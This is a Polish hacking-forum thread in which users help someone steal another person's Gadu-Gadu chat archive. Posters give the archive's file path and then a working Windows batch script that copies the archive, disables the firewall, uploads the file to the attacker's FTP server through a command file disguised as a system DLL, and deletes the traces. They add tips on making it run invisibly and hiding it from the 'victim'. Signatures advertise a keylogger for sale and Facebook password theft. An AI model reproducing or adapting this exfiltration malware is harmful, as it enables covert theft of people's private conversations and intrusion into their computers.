Witammiałbym do was malutką prośbę...
A więc tak, znam hasło do konta GG pewnej osoby i miałbym pytanie czy mogę jakoś zdobyć tej osoby archiwum jeśli się da to w jaki sposób?
Z góry dziękuje z pomoc !!czekam na odpowiedź
Witammiałbym do was malutką prośbę...
A więc tak, znam hasło do konta GG pewnej osoby i miałbym pytanie czy mogę jakoś zdobyć tej osoby archiwum jeśli się da to w jaki sposób?
Z góry dziękuje z pomoc !!czekam na odpowiedź
Musiałbyś ukraść z jego kompa plik "archive.dat"
"Najwyższym osiągnięciem jest pokonać wroga bez walki" - Sun Tzu
---
Sprzedam keyloggera wysyłającego logi na maila, do tego masa dodatków (np. USB spreading).
Kontakt: (gg)41878055
---
a mógłbyś mi powiedzieć w jaki sposób mógłbym to zrobić ??
Dobra to zapytam inaczej ;D...
czy jak dodam tej osoby profil u siebie na kompie, i ta osoba będzie teraz pisała czy będę mógł sprawdzić te rozmowy ?? czy będą się też u mnie zapisywały ??
Ostatnio edytowane przez Vandervir ; 06-01-2012 o 14:39
"Najwyższym osiągnięciem jest pokonać wroga bez walki" - Sun Tzu
---
Sprzedam keyloggera wysyłającego logi na maila, do tego masa dodatków (np. USB spreading).
Kontakt: (gg)41878055
---
Da się jeżeli:
1. Zdobędziesz hasło do Gadu gadu (to chyba już masz zrobione)
2. Uruchomisz w screenie EKG2 na Shellu logując się na ten numer
Czyli na twoje możliwości to raczej VR8 ma rację - Nie. Nie da się :(
Archiwum możesz zdobyć, wystarczy że skopiujesz plik od niego z komputera Archive.db z "C:\Users\user\AppData\Roaming\Gadu-Gadu 10\numer_gg\Archive.db" (W7) i potem otworzysz u siebie na komputerze.
Możesz plik skopiować ręcznie, albo programikiem, który mu wyślesz i wykona to zadanie.
Ostatnio edytowane przez michal31337 ; 06-01-2012 o 15:16
Pomogę w zdobyciu hasła do Facebooka. Pisać na PW.
Piszesz prosty skrypt. Skrypt zawiera informacje co ma zrobić - w tym przypadku skopiować plik potem podajesz mu ścieszkę pliku następnie komende żeby Ci go przesłał. Proste nieprawdaż ?
Dołączam się do tematu.Mógłbym mi ktoś napisać skrypt który umożliwi kradzież archiwum?Mogę go nagrać na pendrive'a i dać ofiarze, ale wolałbym żeby był zdalny.Z góry dziękuje.
Podam skrypt BATCH.
Zrobiłem wcześniej temat z wirusem który wysyła ten plik na konto FTP , ale skoro nie widziałeś , to napiszę go tutaj.
Lepiej go później skonwertować na .EXE i dodać mu funkcję INVISIBLE (nie pamiętam czy to tak) , aby nie było widać okienka programu. Nie wiem czy dobry ten skrypt , jakby był zły to proszę mnie poprawić. Testowałem u siebie , to działał.
@echo off
copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Archive.db" "C:\windows\system32"
echo open [host ftp] >> "%windir%\system32\sysfiles32.dll"
echo [login do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo [haslo do konta ftp] >> "%windir%\system32\sysfiles32.dll"
echo send "C:\windows\system32\Archive.db" >> "%windir%\system32\sysfiles32.dll"
echo quit >> "%windir%\system32\sysfiles32.dll"
netsh firewall set opmode disable
ftp -s:"%windir%\system32\sysfiles32.dll"
cls
netsh firewall set opmode enable
del "C:\windows\system32\Archive.db"
del "C:\windows\system32\sysfiles32.dll"
Ostatnio edytowane przez TheFlaiDer ; 07-01-2012 o 10:54
TheFlaiDer mógłbyś podać skrypt na xp?![]()
W skrypcie można było by poprawić żeby wszystkie ścieżki były uniwersalne (2 brakowało)
Kod:@echo off copy "%appdata%\Gadu-Gadu 10\<numer gadu gadu>\Archive.db" "C:\windows\system32" echo open [host ftp] >> "%windir%\system32\sysfiles32.dll" echo [login do konta ftp] >> "%windir%\system32\sysfiles32.dll" echo [haslo do konta ftp] >> "%windir%\system32\sysfiles32.dll" echo send " %WINDIR%\system32\Archive.db" >> "%windir%\system32\sysfiles32.dll" echo quit >> "%windir%\system32\sysfiles32.dll" netsh firewall set opmode disable ftp -s:"%windir%\system32\sysfiles32.dll" cls netsh firewall set opmode enable del " %WINDIR%\system32\Archive.db" del " %WINDIR%\system32\sysfiles32.dll" exit
Skrypt działa na wszystkich windowsach. Są programy do konwersjii .bat do exe i tam się da zaznaczyć czy okno ma być pokazywane czy nie.
Ostatnio edytowane przez bi-tek ; 09-01-2012 o 00:45
Panoramix korzystam z Twojego skryptu i pojawia sie blad: http://img225.imageshack.us/img225/423/xax.png. CO zle robie?
jak na mój gust to masz niepotrzebne nawiasy ostre '<' i '>' przy numerze GG w ścieżce do pliku z Archirum.. usuń je, zostaw w ścieżce sam numer i powinno banglać..
ale ja się w sumie nie znam![]()
I'm the harbinger of your salvation thru destruction.
harbinger@nefarious.bad.mn - w razie ścisłej potrzeby
Tych nawiasów się nie piszę w programie.
Jest to tylko wyznaczone miejsce do numeru gadu gadu.
Przykład "%appdata%\Gadu-Gadu 10\12345\Archive.db"
Dzieki za odpowiedzi. Mam jeszcze jedno pytanie: Czy ten plik wsadowy da sie ukryc w jakims obrazku zeby "ofiara" nie miala podejrzen? Jesli tak, proszę o sugestie![]()